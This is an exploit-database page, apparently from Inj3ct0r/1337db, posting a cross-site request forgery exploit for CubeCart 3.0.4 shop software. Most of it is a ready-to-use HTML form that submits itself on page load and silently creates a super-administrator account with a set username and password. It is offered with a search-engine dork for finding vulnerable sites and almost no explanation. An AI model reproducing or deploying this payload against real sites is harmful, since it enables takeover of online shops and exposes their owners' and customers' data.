Home / os / win7

[webapps / 0day] - CubeCart 3.0.4 <= CSRF Add Admin

Posted on 24 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>CubeCart 3.0.4 &lt;= CSRF Add Admin | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='CubeCart 3.0.4 &lt;= CSRF Add Admin by P0C T34M in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================ CubeCart 3.0.4 &lt;= CSRF Add Admin ================================ #Script : CubeCart 3.0.4 #Language : Php #Download : http://www.cubecart.com/ #Date : 2010/12/24 #Version : 3.0.4 #Dork : &quot;Powered by CubeCart 3.0.4&quot; #Found : by P0C T34M &gt;&gt; tnt-r00t #Homepage : www.p0c.cc &lt;form name=&quot;p0c&quot; action=&quot;http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new&quot; method=&quot;post&quot;&gt; &lt;input name=&quot;name&quot; type=&quot;hidden&quot; value=&quot;myname&quot;/ &gt; &lt;input name=&quot;adminUsername&quot; type=&quot;hidden&quot; value=&quot;r00t&quot; /&gt; &lt;input name=&quot;email&quot; type=&quot;hidden&quot; value=&quot;myemail@hotmail.com&quot;&gt; &lt;input name=&quot;adminPassword&quot; type=&quot;hidden&quot; value=&quot;t00r&quot; /&gt; &lt;input name=&quot;isSuper&quot; type=&quot;hidden&quot; value=&quot;1&quot; checked=&quot;checked&quot; type=&quot;radio&quot;/&gt; &lt;input name=&quot;adminId&quot; value=&quot;&quot; type=&quot;hidden&quot;/&gt; &lt;input name=&quot;Submit&quot; type=&quot;hidden&quot; class=&quot;submit&quot; value=&quot;Add User&quot; type=&quot;submit&quot;/&gt; &lt;/form&gt; &lt;script&gt;document.p0c.submit();&lt;/script&gt; NICKNAME: P0C T34M # <a href='http://1337db.com/'>1337db.com</a> [2010-12-24]</pre></body></html>

 

TOP